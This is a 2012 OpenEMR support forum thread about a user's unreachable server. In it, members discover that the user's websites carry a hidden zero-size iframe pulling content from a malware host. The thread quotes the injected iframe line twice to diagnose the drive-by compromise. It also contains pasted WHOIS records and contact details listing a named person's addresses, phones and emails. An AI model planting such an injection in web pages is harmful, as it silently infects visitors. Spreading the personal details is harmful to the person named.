anonymous wrote on Sunday, January 29, 2012:
HI,
Thanks for all the great help in the past. If you go to my server now all you get is a couple of symbols…no login screen here’s an example…
http://emr4patients.com:8080/openemr_draskin
If I run it as localhost on the server itself it works fine.
I tried stopping and starting Apache, rebooting the windows server its hosted on, all not helping.
Help! Thanks!
juggernautsei wrote on Sunday, January 29, 2012:
Hi,
did you open port 8080 on your firewall? This is the first thing that comes to my mind. If it is working fine then the path to the outside is blocked. You can run port detective to see what ports you have opened to the web.
Sherwin,
aethelwulffe wrote on Sunday, January 29, 2012:
Actually, it looks like the server is there, just the directory location/vhosts etc… is wrong.
What kind of installation is this?
I noticed when logging into the domain name at port 8080 it DOES ask for a username and password, so it IS doing something, not just timing out. Not meaning to ask a dumb question, but what changed?
There is a tiny possibility that if you truly didn’t do anything to your setup, and you have not been hacked, then your router COULD be *partially* screwing up resolving port 8080. I HAVE seen that before. Routers and switches are flaky things. I would isolate/change the gear involved, or even load up a new or working backup install on another computer to test the system itself before digging into the software side of stuff. Of course, you could just resolve to the domain name and use your login to see if you get index access to the server. Do you have any other sites or applications on that server (sub domain or different domain name) that you can access? Perhaps you can pop a page other than openEMR into the htdocs and test for access.
gutiersa wrote on Sunday, January 29, 2012:
What URL are you using to login from within the server itself:
Localhost
127.0.0.1
192.168.x.x
Or your actual wan IP address?
Or your domain name?
gutiersa wrote on Sunday, January 29, 2012:
also try disabling your windows firewall, (in your server), then accessing your site from a local computer
mike-h30 wrote on Sunday, January 29, 2012:
I get a warning that the subdomain (www.emr4patients.com) contains malware. Here is a screen shot from my browser.
gutiersa wrote on Sunday, January 29, 2012:
ok, we know you can disregard that because your server is yours and has no malware. So you can ignore the warning.
However, since your server is a windows server use IE, and tell me what you get when you use http://localhost/openemr/?site=yoursite
I will be online to help troubleshoot if you want
replace “yoursite” with “default” or the name of your site. depending on your set up, but do not post it here. Just tell me the result
gutiersa wrote on Sunday, January 29, 2012:
Also:
looks like you are trying to access your site from a mac or linux computer (mayb?)
Just let us start at beginning. start with the windows server itself. if needed email me at sourceforge.net
aaversa wrote on Sunday, January 29, 2012:
Actually, I have to disagree here. The warning is from Google and should not be ignored. It is reporting that the site contains content from a known malware source (forghost.3322.org).
It’s quite possible that (if the original reporter is a legitimate user) his site has been compromised.
Aric Aversa
Health Care Technologies
aaversa wrote on Sunday, January 29, 2012:
Looking a little more closely, the main pages for this site (www.emr4doctors.com/www.emr4patients.com) also appear to have malicious code embedded. You can see that the code is causing the client browser to pull in content from the malware site:
</head>
<iframe src=http://forghost.3322.org/ghost/1/index.htm width=0 height=0></iframe>
<body ...
A quick check on google shows this URL has been associated with a trojan horse.
OP - if you are a legitimate OpenEMR user, I strongly recommend you contact a qualified security consultant.
Aric Aversa
Health Care Technologies
gutiersa wrote on Sunday, January 29, 2012:
ok, then time to go back to the server, and stay within the LAN
anonymous wrote on Monday, January 30, 2012:
It might be the Free DNS we are using.
aaversa wrote on Monday, January 30, 2012:
Sorry, but I don’t think so. This looks like a classic example of a drive-by attack. Also, your “Free DNS” service 3322.org has a history of being used in these types of schemes.
Frankly, this is the 2nd thread in this forum where you’ve been notified of the malware warnings, and you are suspiciously unconcerned (https://sourceforge.net/projects/openemr/forums/forum/202506/topic/4503616?message=10944959).
In fact, I’d go so far as to caution others here to avoid this poster’s site(s) until this issue has been properly addressed. It would also be wise to run a malware scan if you visited any of the associated urls.
Aric Aversa
Health Care Technologies
mike-h30 wrote on Monday, January 30, 2012:
Can one of the mods ( Brady, Rod, Tony) notify SourceForge and verify the credentials of the original poster? Aric bring up a good point:
** “this is the 2nd thread in this forum where you’ve been notified of the malware warnings, and you are suspiciously unconcerned (https://sourceforge.net/projects/openemr/forums/forum/202506/topic/4503616?message=10944959).”**
This poses a serious risk to the numerous and unsuspecting Windows users visiting this forum, especially those that have sensitive data like patient information on their Windows machines.
Mike
bradymiller wrote on Monday, January 30, 2012:
Hi,
For the sourceforge user, I only see: https://me.yahoo.com/a/0YPc1OBv
I do not know who this user is, however Tony has referred to this user as Don in the past. Would be nice to get clarification that this user is known in the community so everybody isn’t worried. If can’t get clarification or verify who this user is, then it’s easy to delete the posts that contain the risky links.
-brady
bradymiller wrote on Tuesday, January 31, 2012:
Hi,
If I don’t get confirmation on this user by tomorrow (either by the user themselves or somebody who knows this user), then will delete the posts here that contain the apparent bad links.
thanks,
-brady
gutiersa wrote on Tuesday, January 31, 2012:
here is info on owner of emr4doctors.com: from godaddy.com
Registrant:
Claims Tiger Software
Don Lewis
1481 Sequoia Dr
Hebron, KY 41048
US
Phone: +1.7027673136
Email: don@emr4doctors.com
Registrar Name….: Register.com
Registrar Whois…: whois.register.com
Registrar Homepage: www.register.com
Domain Name: emr4doctors.com
Created on……………: 2004-03-16
Expires on……………: 2012-03-16
Administrative Contact:
Morninglight Software
Don Lewis
8633 Portofino Ct
Las Vegas, Nv 89117
US
Phone: 1-702-8379291
Email: donelewis@lvcoxmail.com
Technical Contact:
Register.Com
Domain Registrar
575 8th Avenue 11th Floor
New York, NY 10018
US
Phone: 1-902-7492701
Email: domain-registrar@register.com
DNS Servers:
dns027.c.register.com
dns056.b.register.com
dns219.a.register.com
dns010.d.register.com
Registrant:
Claims Tiger Software
Don Lewis
1481 Sequoia Dr
Hebron, KY 41048
US
Phone: +1.7027673136
Email: don@emr4doctors.com
Registrar Name….: Register.com
Registrar Whois…: whois.register.com
Registrar Homepage: www.register.com
Domain Name: emr4doctors.com
Created on……………: 2004-03-16
Expires on……………: 2012-03-16
Administrative Contact:
Morninglight Software
Don Lewis
8633 Portofino Ct
Las Vegas, Nv 89117
US
Phone: 1-702-8379291
Email: donelewis@lvcoxmail.com
Technical Contact:
Register.Com
Domain Registrar
575 8th Avenue 11th Floor
New York, NY 10018
US
Phone: 1-902-7492701
Email: domain-registrar@register.com
DNS Servers:
dns027.c.register.com
dns056.b.register.com
dns219.a.register.com
dns010.d.register.com
Visit AboutUs.org for more information about emr4doctors.com
AboutUs: emr4doctors.com
Registrar: REGISTER.COM, INC.
Whois Server: whois.register.com
Creation Date: 16-MAR-2004
Updated Date: 14-MAR-2011
Expiration Date: 16-MAR-2012
Nameserver: DNS010.D.REGISTER.COM
Nameserver: DNS027.C.REGISTER.COM
Nameserver: DNS056.B.REGISTER.COM
Nameserver: DNS219.A.REGISTER.COM
Registry Status: ok
gutiersa wrote on Tuesday, January 31, 2012:
this shows up for emr4patients.com: also from godaddy.com
WHOIS Information
Registrant
Domains By Proxy, LLC
(480) 624-2599 Phone
(480) 624-2598 Fax
DomainsByProxy.com
15111 N. Hayden Rd., Ste 160, PMB 353
Scottsdale, Arizona 85260
United States
emr4patients.com@domainsbyproxy.com
Administrative Contact
Registration Private
Domains By Proxy, LLC
(480) 624-2599 Phone
(480) 624-2598 Fax
DomainsByProxy.com
15111 N. Hayden Rd., Ste 160, PMB 353
Scottsdale, Arizona 85260
United States
emr4patients.com@domainsbyproxy.com
Technical Contact
Registration Private
Domains By Proxy, LLC
(480) 624-2599 Phone
(480) 624-2598 Fax
DomainsByProxy.com
15111 N. Hayden Rd., Ste 160, PMB 353
Scottsdale, Arizona 85260
United States
emr4patients.com@domainsbyproxy.com
Registered Through
GoDaddy.com, LLC
Domain Name: emr4patients.com
Created on: 8/19/2007 6:24:30 PM
Expires on: 8/19/2012 6:24:30 PM
Last Updated on: 7/23/2011 8:18:15 AM
Domain Servers
NS1.AFRAID.ORGNS2.AFRAID.ORGNS3.AFRAID.ORGNS4.AFRAID.ORG
drdonelewis wrote on Tuesday, January 31, 2012:
I did not know that my membership was not displaying my email or other information. Thanks for the phone call regarding my information. You welcome to remove all of my posts and any code changes I suggested. We had a conflict with a webcam that was talking to port 8080 after all it was not an outside threat. Thank you.
Don Lewis
800-758-9539
drwhiplash@yahoo.com
bradymiller wrote on Tuesday, January 31, 2012:
Hi Don,
There’s no reason to remove your posts if we know who you are. Just wanted to make sure an anonymous user wasn’t posting links to a malware site, which is not the case. What is going on with the issue that aaversa brought up above regarding the apparent code on your site:
</head>
<iframe src=http://forghost.3322.org/ghost/1/index.htm width=0 height=0></iframe>
<body ...
Are you able to remove this from your site?
-brady